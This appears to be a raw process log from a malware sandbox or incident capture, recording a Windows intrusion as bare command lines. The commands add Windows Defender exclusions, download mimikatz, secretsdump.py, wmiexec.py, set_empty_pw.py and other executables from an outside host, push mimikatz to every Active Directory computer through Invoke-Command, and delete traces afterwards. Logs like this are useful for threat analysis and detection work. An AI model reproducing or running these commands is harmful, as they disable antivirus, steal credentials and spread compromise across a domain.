cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
2672powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
2732cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
2836powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Dpose.exe -Outfile C:\WinXRAR\Dpose.exe
2896cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
2980powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Bootxr.exe -Outfile C:\WinXRAR\Bootxr.exe
3040cmd.exe cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\mimikatz.exe"
1404PING.EXE ping 1.1.1.1 -n 1 -w 3000
2204python.exe python --version
2108powershell.exe powershell -Command " $computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'if not exist C:\WinXRAR mkdir C:\WinXRAR && powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe && C:\WinXRAR\mimikatz.exe' } "
2088cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
2472powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/wmiexec.py -Outfile C:\WinXRAR\wmiexec.py
2596cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
2684powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/Mizedo.exe -Outfile C:\WinXRAR\Mizedo.exe
2784cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
2728powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/set_empty_pw.py -Outfile C:\WinXRAR\set_empty_pw.py
2952cmd.exe cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
452powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/secretsdump.py -Outfile C:\WinXRAR\secretsdump.py
2984